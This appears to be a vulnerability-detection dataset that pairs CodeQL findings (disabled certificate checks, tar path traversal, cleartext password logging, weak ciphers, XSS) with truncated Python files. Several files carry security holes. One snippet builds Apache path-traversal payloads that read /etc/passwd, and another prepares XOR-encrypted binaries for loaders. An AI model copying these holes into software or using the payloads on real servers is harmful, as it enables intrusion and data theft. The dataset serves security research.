[ "MEDIUM", "MEDIUM" ]
[ "Suspicious character range that overlaps with \\w in the same character class.", "Suspicious character range that overlaps with \\w in the same character class." ]
[ 48, 48 ]
[ null, null ]
[ 23, 26 ]
[ 26, 29 ]
2024-11-18T21:14:00.304375+00:00
1,592,510,402,000
b4e61725ceca4b3e360cf8271c1e92627422c1db
2
{ "blob_id": "b4e61725ceca4b3e360cf8271c1e92627422c1db", "branch_name": "refs/heads/master", "committer_date": 1592510402000, "content_id": "61c4234100942593c2b975b9b34b1228ca5119e1", "detected_licenses": [ "MIT" ], "directory_id": "dffb3350729d8c3eb2a59da8f178a777ee56fca6", "extension": "py", "fi...
2.4375
stackv2
#!/usr/bin/env python # This script comes with no warranty use at your own risk # # Title: pause_snapshot # Author: Drew Russell - Rubrik Ranger Team # Date: 03/29/2018 # Python ver: 3.6.4 # # Description: # # Pause and Resume a policy driven snapshot of a Virtual Machine ######################################## User ...
224
28.46
141
21
1,483
python
[{"finding_id": "codeql_py/request-without-cert-validation_c8189cab9854cc27_af671b94", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
2
true
[ "CWE-295", "CWE-295" ]
[ "py/request-without-cert-validation", "py/request-without-cert-validation" ]
[ "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation because [it is disabled](1)." ]
[ 76, 104 ]
[ null, null ]
[ 23, 16 ]
[ 92, 93 ]
2024-11-18T21:14:05.785747+00:00
1,619,534,653,000
00bebc715a70c307f24aedd7f37290eb8bbbde6b
3
{ "blob_id": "00bebc715a70c307f24aedd7f37290eb8bbbde6b", "branch_name": "refs/heads/main", "committer_date": 1619534653000, "content_id": "019bc6007b2117d0a9872b1910c1246ed2df2b0d", "detected_licenses": [ "MIT" ], "directory_id": "5c5e2af6257627c6932bba48699829a128655a8e", "extension": "py", "file...
2.515625
stackv2
# -*- coding: utf-8 -*- # Copyright 2018 The TensorFlow Authors and jiahuei. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENS...
318
32.41
88
21
2,541
python
[{"finding_id": "codeql_py/tarslip_e0181a77fab70b01_8344954a", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un...
1
true
[ "CWE-022" ]
[ "py/tarslip" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This file extraction depends on a [potentially untrusted source](1)." ]
[ 309 ]
[ null ]
[ 21 ]
[ 28 ]
2024-11-18T21:14:06.341735+00:00
1,480,364,796,000
018af0dc5ebad1aec58a93105da341657311e19b
2
{ "blob_id": "018af0dc5ebad1aec58a93105da341657311e19b", "branch_name": "refs/heads/master", "committer_date": 1480364796000, "content_id": "3193195b7a6d0dc108e1c1aa9c18be193d264bad", "detected_licenses": [ "MIT" ], "directory_id": "96cdabe5d336b05cee68444109ac2978f1f3e617", "extension": "py", "fi...
2.3125
stackv2
from flask import redirect, url_for, render_template, request, flash, abort from flask_login import login_user, logout_user, login_required, current_user from sqlalchemy import func from sqlalchemy.exc import IntegrityError from nodeadmin import app, login_manager, db from nodeadmin.models import * from nodeadmin.form...
112
31.74
77
16
807
python
[{"finding_id": "codeql_py/url-redirection_b38f5a4d963a563e_7fd3a3c0", "tool_name": "codeql", "rule_id": "py/url-redirection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Untrusted URL redirection depends on a [user-provided value](1).", "remediation": "", "location": {"file_...
1
true
[ "CWE-601" ]
[ "py/url-redirection" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Untrusted URL redirection depends on a [user-provided value](1)." ]
[ 31 ]
[ null ]
[ 25 ]
[ 48 ]
2024-11-18T21:14:11.402179+00:00
1,575,950,397,000
3b15d16480936c27e2f503c5eab334c03e972a39
2
{ "blob_id": "3b15d16480936c27e2f503c5eab334c03e972a39", "branch_name": "refs/heads/master", "committer_date": 1575950397000, "content_id": "aeb7ae5b9209e4e2e62141edc93061d4b6a813f6", "detected_licenses": [ "MIT" ], "directory_id": "9379ed55226124493d637b2a3f964fe49c23497e", "extension": "py", "fi...
2.453125
stackv2
import json import requests import math import pandas as pd import numpy as np from mendeleev import element from periodictable import formulas materials_codes = open("Raw_dataset/full_mpid_list_cell_size_sort.txt") # materials_codes = open("Raw_dataset/mpid_list_cell_size_sort_end.txt") url_base = "https://www.mater...
52
25.54
88
14
383
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_896e1072c6efc25e_4e7b1d23", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 44 ]
[ null ]
[ 7 ]
[ 19 ]
2024-11-18T21:14:18.088094+00:00
1,583,695,288,000
d86fe10a732119f6afb78d1d69ec61fa2ddd2a3d
3
{ "blob_id": "d86fe10a732119f6afb78d1d69ec61fa2ddd2a3d", "branch_name": "refs/heads/master", "committer_date": 1583695288000, "content_id": "31c8031f099de6ee7503deb19194f8c1477da942", "detected_licenses": [ "Unlicense" ], "directory_id": "d02275e2b28311be5f7ed2af35c6d64aa722606e", "extension": "py",...
2.875
stackv2
#!/usr/bin/python # # # Simple tool to take an arbitrary binary (DLL, exe, etc.) # and convert it to a XOR encrypted char array for embedding # in loaders that decrypt the data in memory and do something # useful with it. # # Drew Kirkpatrick # drew.kirkpatrick@gmail.com # @hoodoer # # Various bits borrowed and stole...
134
23.46
103
14
808
python
[{"finding_id": "codeql_py/clear-text-storage-sensitive-data_d79c231678a45651_0f0ea832", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."...
1
true
[ "CWE-312" ]
[ "py/clear-text-storage-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression stores [sensitive data (password)](1) as clear text." ]
[ 127 ]
[ null ]
[ 25 ]
[ 39 ]
2024-11-18T21:14:22.048324+00:00
1,678,181,179,000
742c90df1676d80ceb0c7fa6d7436da3bc078fa7
2
{ "blob_id": "742c90df1676d80ceb0c7fa6d7436da3bc078fa7", "branch_name": "refs/heads/master", "committer_date": 1678181179000, "content_id": "033f46f25afa686c8edc72351e3e39d748127709", "detected_licenses": [ "Apache-2.0" ], "directory_id": "7a7af74cf20411f6d49007ff441301bfa5291c71", "extension": "py"...
2.3125
stackv2
#!/usr/bin/env python # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, softwar...
83
38.67
109
11
716
python
[{"finding_id": "codeql_py/tarslip_a2128a93353ba94a_d3da8a45", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un...
1
true
[ "CWE-022" ]
[ "py/tarslip" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This file extraction depends on a [potentially untrusted source](1)." ]
[ 40 ]
[ null ]
[ 5 ]
[ 8 ]
2024-11-18T21:14:41.387953+00:00
1,606,301,386,000
13d0bd3f981622f47bc66c4cff658cfc64dd7b7c
3
{ "blob_id": "13d0bd3f981622f47bc66c4cff658cfc64dd7b7c", "branch_name": "refs/heads/main", "committer_date": 1606301386000, "content_id": "286f92ebb5154f029dc74cb4323b06ce3753f2d9", "detected_licenses": [ "MIT" ], "directory_id": "801e36b6852349761332a6dc3f4e0038a2872868", "extension": "py", "file...
2.859375
stackv2
import bcrypt as bc import time, sys, os, random BASEPATH = os.path.join(os.sep, 'davide', 'home', 'userexternal', 'mberti00', 'Scripts', 'Crack') if len(sys.argv) > 1 and int(sys.argv[1]): max_number = int(sys.argv[1]) if len(sys.argv) > 2: if sys.argv[2] == 'random': # random word betwee...
52
32.35
101
18
451
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0d463db3dbc925f7_435afdb4", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text." ]
[ 30 ]
[ null ]
[ 7 ]
[ 101 ]
2024-11-18T20:10:46.714760+00:00
1,417,706,858,000
cdb31ae623a585c9f777e63199b4d61a6b019f8c
3
{ "blob_id": "cdb31ae623a585c9f777e63199b4d61a6b019f8c", "branch_name": "refs/heads/master", "committer_date": 1417706858000, "content_id": "2221eff5c85e2132c55b00a059166ad1765304e2", "detected_licenses": [ "Apache-2.0" ], "directory_id": "95f422c2ef2b1f1b4c6a6707002aab63cc5a2c39", "extension": "py"...
3.265625
stackv2
from Crypto.Cipher import Blowfish import binascii class MyBlowFish: """ Blow fish encryption and decryption """ def __init__(self, key): self.key = key @staticmethod def padding_pcks5(clear_text): byte_num = len(clear_text) packing_len = 8 - byte_num % 8 appen...
39
26.18
64
12
260
python
[{"finding_id": "codeql_py/weak-cryptographic-algorithm_ba2ab439527da89c_dec7d311", "tool_name": "codeql", "rule_id": "py/weak-cryptographic-algorithm", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "[The block mode ECB](1) is broken or weak, and should not be used.", "remediation": ...
2
true
[ "CWE-327", "CWE-327" ]
[ "py/weak-cryptographic-algorithm", "py/weak-cryptographic-algorithm" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "[The block mode ECB](1) is broken or weak, and should not be used.", "[The block mode ECB](1) is broken or weak, and should not be used." ]
[ 22, 26 ]
[ null, null ]
[ 16, 42 ]
[ 41, 64 ]
2024-11-18T20:11:01.371663+00:00
1,687,413,046,000
e25f07536092e93edc667c6a6a755a3f6c48c3be
3
{ "blob_id": "e25f07536092e93edc667c6a6a755a3f6c48c3be", "branch_name": "refs/heads/master", "committer_date": 1687413046000, "content_id": "9191cf44c5fb9592a4627cab674a7394656d88e6", "detected_licenses": [ "Apache-2.0" ], "directory_id": "39edd58f22cea9d92fa8a4e5c7704d3f1a59a979", "extension": "py"...
2.90625
stackv2
import datetime import time import numpy as np import requests USER_AGENT = ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/68.0.3440.84 Safari/537.36" ) def requests_get(url, header): try: res = requests.get(url, verify=False, timeout=10, headers=he...
165
26.55
87
16
1,436
python
[{"finding_id": "codeql_py/request-without-cert-validation_664ae98ecd153c74_8d139d8c", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
2
true
[ "CWE-295", "CWE-295" ]
[ "py/request-without-cert-validation", "py/request-without-cert-validation" ]
[ "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation because [it is disabled](1)." ]
[ 15, 24 ]
[ null, 26 ]
[ 15, 15 ]
[ 74, 10 ]
2024-11-18T20:48:10.624605+00:00
1,570,814,301,000
60629729a22703f94670de36e2bf4072c7df3417
3
{ "blob_id": "60629729a22703f94670de36e2bf4072c7df3417", "branch_name": "refs/heads/master", "committer_date": 1570814301000, "content_id": "f4576cf39d4b371507c369128b16230979538716", "detected_licenses": [ "MIT" ], "directory_id": "8c91511845bd3574e02f999b75e263b152698b99", "extension": "py", "fi...
3.421875
stackv2
titulo = 'JOGO DA FORCA' linha1 = '←' * 10 linha2 = '→' * 10 linha3 = '—' * 30 linha4 = '*' * 26 linha5 = '←' * 42 linha6 = '→' * 42 chancesLimite = 0 chances = 1 l = 0 from random import randint y = randint print() print(linha1, end= '') print(linha2) print(titulo.center(22)) print(linha2, end='') print(linha1) pr...
91
21.74
81
16
675
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_6258a98b9a5deb42_5476c68a", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (secret)](1) as clear text." ]
[ 39 ]
[ null ]
[ 7 ]
[ 21 ]
2024-11-18T20:48:17.514837+00:00
1,633,961,467,000
b5f2e389d482ee496a3f5baf497ef147175a4719
3
{ "blob_id": "b5f2e389d482ee496a3f5baf497ef147175a4719", "branch_name": "refs/heads/main", "committer_date": 1633961467000, "content_id": "f4e15eb810e970ccbca182079e48f24eda053b01", "detected_licenses": [ "BSD-3-Clause" ], "directory_id": "6ef9b86ddfbd7034ab43f6687541d99fe67ecc75", "extension": "py"...
2.59375
stackv2
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests def pathnya(): path1 = '/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd' path2 = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' path3 = '/icons/%%32%65%%32%65/%%32%6...
60
36.92
138
16
830
python
[{"finding_id": "codeql_py/request-without-cert-validation_e94e7dfa5fbd852b_941c62ee", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
4
true
[ "CWE-295", "CWE-295", "CWE-295", "CWE-295" ]
[ "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation becau...
[ 26, 34, 42, 50 ]
[ null, null, null, null ]
[ 23, 23, 23, 23 ]
[ 86, 86, 86, 86 ]
2024-11-18T20:48:34.090765+00:00
1,530,776,283,000
a94b30d05d43fcf586df73b6e9202be293d302e4
3
{ "blob_id": "a94b30d05d43fcf586df73b6e9202be293d302e4", "branch_name": "refs/heads/master", "committer_date": 1530776283000, "content_id": "dfc6a5a0c1492df707c692aa83ee244bce82f026", "detected_licenses": [ "Apache-2.0" ], "directory_id": "f09799389e387561f5ba38ed4605460d29b14e2a", "extension": "py"...
3
stackv2
from flask import Flask, request, abort app = Flask(__name__) @app.route('/') def welcome(): return "Basic webserver, returns data received through /add_message" @app.route('/add_message', methods=['POST']) def add_message(): if request.method == 'POST': if request.data: print "received...
25
22.44
72
13
133
python
[{"finding_id": "codeql_py/reflective-xss_062b9fc6be5ce6f1_6da4bb79", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi...
1
true
[ "CWE-079" ]
[ "py/reflective-xss" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Cross-site scripting vulnerability due to a [user-provided value](1)." ]
[ 16 ]
[ null ]
[ 20 ]
[ 32 ]
2024-11-18T21:25:55.123663+00:00
1,580,313,784,000
940a3130c6e5df92455677eefd31a6dcd982600c
2
{ "blob_id": "940a3130c6e5df92455677eefd31a6dcd982600c", "branch_name": "refs/heads/master", "committer_date": 1580313784000, "content_id": "d4a2c831b5eac495e354c6654c2e06a21e8e0e92", "detected_licenses": [ "MIT" ], "directory_id": "72d95f3b8c4de3e76c1125b2e6573539cadbe66a", "extension": "py", "fi...
2.375
stackv2
# coding: utf-8 #!/usr/bin/env python3 'Tencent ASR && TTS API' __author__ = 'Charles Li, Joseph Pan' import time import uuid import json import random import requests import hmac import base64 import urllib #腾讯web API一句话识别请求 class tencentSpeech(object): __slots__ = 'SECRET_ID', 'SECRET_KEY', 'SourceType', 'URL'...
214
37.36
127
18
1,938
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_45e68bfabee0f76a_722962a7", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (secret)](1) is used in a hashing algorithm (SHA1) that is insecu...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (secret)](1) is used in a hashing algorithm (SHA1) that is insecure.\n[Sensitive data (id)](2) is used in a hashing algorithm (SHA1) that is insecure.\n[Sensitive data (secret)](3) is used in a hashing algorithm (SHA1) that is insecure." ]
[ 209 ]
[ null ]
[ 48 ]
[ 64 ]
2024-11-18T21:52:05.755456+00:00
1,448,909,025,000
cc53d4e1c09e8c39ad29ed19c0ef7ba9f5a59b9e
3
{ "blob_id": "cc53d4e1c09e8c39ad29ed19c0ef7ba9f5a59b9e", "branch_name": "refs/heads/master", "committer_date": 1448909025000, "content_id": "f937bd57338855909ba2da0e88387de01d065403", "detected_licenses": [ "BSD-2-Clause" ], "directory_id": "d83d59f27aef33cb6e25e7ccc062d290d15b2a9d", "extension": "p...
2.5625
stackv2
# coding: utf-8 import requests from functools import wraps VERSION = 'v1' PAGESIZE = 10 def must_have_token(func): @wraps(func) def wrapper(*args, **kwargs): if not args[0].token: raise ValueError('You must specify a valid user token to use this method') result = func(*args, **kwa...
43
22.65
86
13
239
python
[{"finding_id": "codeql_py/request-without-cert-validation_2b9a7a9dd890a38c_18eb8f70", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
1
true
[ "CWE-295" ]
[ "py/request-without-cert-validation" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1) by [this value](2)." ]
[ 38 ]
[ null ]
[ 20 ]
[ 72 ]
2024-11-18T21:52:09.110062+00:00
1,693,344,208,000
791afd7ce5e1df2b468b2c42e3ba75d7946b97d3
3
{ "blob_id": "791afd7ce5e1df2b468b2c42e3ba75d7946b97d3", "branch_name": "refs/heads/main", "committer_date": 1693344208000, "content_id": "5303e89e2224d49593d83885a9761a49e85f3c2b", "detected_licenses": [ "MIT" ], "directory_id": "4cbc8b81d197bc392d1b57856254300331b9738f", "extension": "py", "file...
2.6875
stackv2
#!/usr/bin/env python3 # -*- coding: utf-8 -*- modules = ['urllib','requests','random','click','os'] for module in modules: try: __import__(module) except Exception as e: print('Installing modules...') os.system('pip3 install ' + str(module)) # os.system('clear') import click ...
26
23.85
109
13
158
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_1dac4d6ae063e2ab_d39fd72c", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 22 ]
[ null ]
[ 15 ]
[ 38 ]
2024-11-18T21:52:09.592762+00:00
1,483,967,690,000
cbc647a25f211239dc85170f8cbf8c8909aea45e
2
{ "blob_id": "cbc647a25f211239dc85170f8cbf8c8909aea45e", "branch_name": "refs/heads/master", "committer_date": 1483967690000, "content_id": "793e20c23db746c1943d5d245f628e40c633195d", "detected_licenses": [ "MIT" ], "directory_id": "745543452be89d426825b797d2cd4a28f7ffced7", "extension": "py", "fi...
2.390625
stackv2
#!/usr/bin/env python from __future__ import print_function import requests import prettytable import memoizer import argparse import json import os try: import ConfigParser except: from configparser import ConfigParser from . import __version__ config_file_path = "~/.redmine-cli" api_key = None root_u...
229
28.23
112
15
1,570
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_69022e2dc92ed204_6eb0b055", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT...
2
true
[ "CWE-312", "CWE-312" ]
[ "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.", "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text." ]
[ 87, 103 ]
[ null, null ]
[ 15, 15 ]
[ 52, 82 ]
2024-11-18T21:52:12.280446+00:00
1,577,737,641,000
296aeb47788bbf6c95ac2ef7552108c615c94cae
3
{ "blob_id": "296aeb47788bbf6c95ac2ef7552108c615c94cae", "branch_name": "refs/heads/master", "committer_date": 1577737641000, "content_id": "bab0cb8acf1328bc737f58f6212695c9dc987524", "detected_licenses": [ "BSD-3-Clause" ], "directory_id": "235ae3d94ec178d36de926a5cf3766aa211c0fc8", "extension": "p...
2.875
stackv2
import re import os import sys # NOTICE! # Before run you have to: # 0. Create NOTE_DIR and BEAR_DIR dirs # 1. Run commands near `files = [` and `dirs = [` # 2. Paste the results in shown format # Optionally you can also change below config dirs # config dirs NOTE_DIR = "Notes/" # output dir BEAR_DIR =...
133
26.41
104
19
920
python
[{"finding_id": "codeql_py/overly-large-range_073a0f287c919f3f_df36e55a", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\].", "remediation": "", "lo...
2
true
[ "CWE-020", "CWE-020" ]
[ "py/overly-large-range", "py/overly-large-range" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\].", "Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\]." ]
[ 41, 41 ]
[ null, null ]
[ 35, 42 ]
[ 38, 45 ]
2024-11-18T21:52:15.960803+00:00
1,641,173,647,000
470ab7dee103180f8225542a56f6e431d544da3c
2
{ "blob_id": "470ab7dee103180f8225542a56f6e431d544da3c", "branch_name": "refs/heads/master", "committer_date": 1641173647000, "content_id": "72504a6798dfd7afe91c1e8ad9d9cc0310535cbd", "detected_licenses": [ "Apache-2.0" ], "directory_id": "4d094be19bcde6088d3e59e2146ef1ba5f2fbfdd", "extension": "py"...
2.34375
stackv2
# -*- coding: utf-8 -*- # # Copyright 2017 Open Targets # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or...
316
34.21
117
16
2,576
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_03159f0d9105df68_38679031", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 242 ]
[ null ]
[ 22 ]
[ 66 ]
2024-11-18T21:52:17.866757+00:00
1,541,147,169,000
c0b106b250ad82b02114c6119170ca78cef75292
3
{ "blob_id": "c0b106b250ad82b02114c6119170ca78cef75292", "branch_name": "refs/heads/master", "committer_date": 1541147169000, "content_id": "a13b2f0b22b78e95cd8e9f859944650d6d207e2a", "detected_licenses": [ "MIT" ], "directory_id": "3441e2f3d36ad9de6b57e6ccf4b2dc3172430446", "extension": "py", "fi...
2.546875
stackv2
#!/usr/bin/env python import json from jinja2 import Template, Environment, FileSystemLoader id_counter = 0 def counter(): global id_counter id_counter += 1 return '{}'.format(id_counter) def reset_counter(): global id_counter id_counter = 0 return '' def main(data, template, output_file): env = Environment...
30
25.2
62
13
197
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_953f9ddeea087d44_31a6dda6", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 19 ]
[ null ]
[ 8 ]
[ 21 ]
2024-11-18T21:52:25.685430+00:00
1,518,721,804,000
df9c22d912126eaf807b6c2026951de84f32d5c4
4
{ "blob_id": "df9c22d912126eaf807b6c2026951de84f32d5c4", "branch_name": "refs/heads/master", "committer_date": 1518721804000, "content_id": "31c0b1af553bebf60c610081b4fb4132715d63eb", "detected_licenses": [ "MIT" ], "directory_id": "0c3e07ee839faa96e1edd8a65df9b9b3864889d6", "extension": "py", "fi...
4.03125
stackv2
import json ##birthday_dict = { ## 'Colby': '05/25/1991', ## 'Tiffany': "09/27/1990", ## 'Albert': '03/14/1879', ## 'Rowan': '01/06/1955' ##} ## ##with open("birthday.json", "w") as f: ## json.dump(birthday_dict, f) def read_dict(): with open("birthday.json", "r") as f: birthdays = json.load...
38
27.92
68
13
309
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_80fbf92ad4ce70d5_69981d4f", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.\nTh...
2
true
[ "CWE-312", "CWE-312" ]
[ "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text.", "This expression logs [sensitive data (private)](1) as clear text.\nThis expression logs [sensitive data (private)](2) as clear text." ]
[ 30, 34 ]
[ null, null ]
[ 15, 15 ]
[ 19, 68 ]
2024-11-18T21:52:29.368629+00:00
1,657,133,209,000
8db9ec9d10649c2709e5afda3b7e03f6225895ac
3
{ "blob_id": "8db9ec9d10649c2709e5afda3b7e03f6225895ac", "branch_name": "refs/heads/master", "committer_date": 1657133209000, "content_id": "e9feb0d52d18fc5f6a190da5b39acdc4f212bf2c", "detected_licenses": [ "Apache-2.0" ], "directory_id": "fa0ee3daeed8edb10e98b6772fa39923243d53c5", "extension": "py"...
2.953125
stackv2
""" https://edabit.com/challenge/haaS4SBv42N3btcg5 """ import hashlib def get_sha256_hash(passwd: str) -> str: m = hashlib.sha256(passwd.encode()) return m.hexdigest() assert get_sha256_hash("hi") == "8f434346648f6b96df89dda901c5176b10a6d83961dd3c1ac88b59b2dc327aa4" assert get_sha256_hash("password123") =...
18
28.33
120
10
285
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_8f66b5b630cfa6a4_fb6e9450", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is in...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (password)](1) is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function." ]
[ 10 ]
[ null ]
[ 24 ]
[ 39 ]
2024-11-18T20:31:26.571784+00:00
1,464,097,820,000
717672dc42497d1531c8e85d9c42b7560c6c29a8
2
{ "blob_id": "717672dc42497d1531c8e85d9c42b7560c6c29a8", "branch_name": "refs/heads/master", "committer_date": 1464097820000, "content_id": "6ddac463fd251f7984533967f70b0450fa38654c", "detected_licenses": [ "MIT" ], "directory_id": "870ed62fbd80ea02e2e720e2ad3ab9731897dc1a", "extension": "py", "fi...
2.34375
stackv2
from wsgiref.simple_server import make_server from sys import exc_info from traceback import format_tb from wsgiref.util import request_uri, shift_path_info from projector import Button, InputSource, HD250, ProjectorCommunicationError from itertools import izip from functools import wraps import json projector = None ...
149
30.59
77
19
1,096
python
[{"finding_id": "codeql_py/stack-trace-exposure_458e22584e8e30a4_d09aea46", "tool_name": "codeql", "rule_id": "py/stack-trace-exposure", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Stack trace information](1) flows to this location and may be exposed to an external user.", "...
1
true
[ "CWE-209" ]
[ "py/stack-trace-exposure" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Stack trace information](1) flows to this location and may be exposed to an external user." ]
[ 137 ]
[ null ]
[ 12 ]
[ 18 ]
2024-11-18T20:31:33.655904+00:00
1,345,151,317,000
